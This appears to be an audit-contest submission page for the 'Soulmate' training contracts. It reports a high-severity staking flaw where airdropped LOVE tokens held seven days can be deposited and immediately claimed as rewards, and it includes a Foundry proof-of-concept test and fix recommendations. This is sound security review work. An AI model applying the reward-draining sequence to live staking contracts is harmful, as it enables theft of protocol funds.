First Flight #9: Soulmate

First Flight #9

Beginner FriendlyFoundryNFT

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Users can claim at least the amount staked at the point of deposit when they accumulate airdrop for at least 7 days before staking their tokens

josh4324

Summary

The Soulmate staking contract allows users to deposit tokens and claim reward every week and can withdraw their balance at any time. There is a vulnerability that allows users who can hold the love token after claiming the airdrop for at least 7 days to claim at least their deposit. This means if a user claims an airdrop every day for 7 days, the user will have 7 tokens, if the user decides to deposit the 7 tokens into the contract, the user can claim 7 tokens immediately after depositing the tokens. This means the user still has 7 tokens and has withdrawed 7 tokens to his wallet.

Vulnerability Details

Claim daily airdrop over 7 days, accumulating 7 LOVE tokens
Deposit these 7 tokens into the staking contract
Because the tokens were held for 7 days, immediately withdraw over 7 tokens
This results in the user withdrawing more than they deposited into the contract.

POC

function test_beat() public {

// start soulmate1 and soulmate2 and mint soulmate token

vm.prank(soulmate1);

soulmateContract.mintSoulmateToken();

vm.prank(soulmate2);

soulmateContract.mintSoulmateToken();

// Add a 7 days period

vm.warp(block.timestamp + (7 days));

// Soulmate 1 claim airdrop after 7 day // 7 tokens

vm.prank(soulmate1);

airdropContract.claim();

// Soulmate 2 claim airdrop after 7 day // 7 tokens

vm.prank(soulmate2);

airdropContract.claim();

// Soulmate 1 approve and deposit 7 tokens

vm.startPrank(soulmate1);

loveToken.approve(address(stakingContract), 7 ether);

stakingContract.deposit(7 ether);

// Soulmate 1 claim rewards // 7 tokens

stakingContract.claimRewards();

// Soulmate 1 withdraw remaining token // 7 tokens

stakingContract.withdraw(7 ether);

console2.log(loveToken.balanceOf(soulmate1)); // soulmate 1 has 14 tokens

vm.stopPrank();

}

Impact

This vulnerability could lead to:

Distortion of the token economic incentives
Unfair depletion of staking rewards
Market effects from actors exploiting this issue

Tools Used

Manual Review

Recommendations

Separating airdrop eligibility from staking timelines
Improving logic checks around time held per user's balance
Limiting withdrawals strictly to deposited amounts
Closing this loophole will ensure fairer incentives for LOVE staking participants.

Updates

Lead Judging Commences

0xnevi Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

finding-claimRewards-multi-deposits-time

High severity, this allows users to claim additional rewards without committing to intended weekly staking period via multi-deposit/deposit right before claiming rewards.

Rewards breakdown

nSLOC

233

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.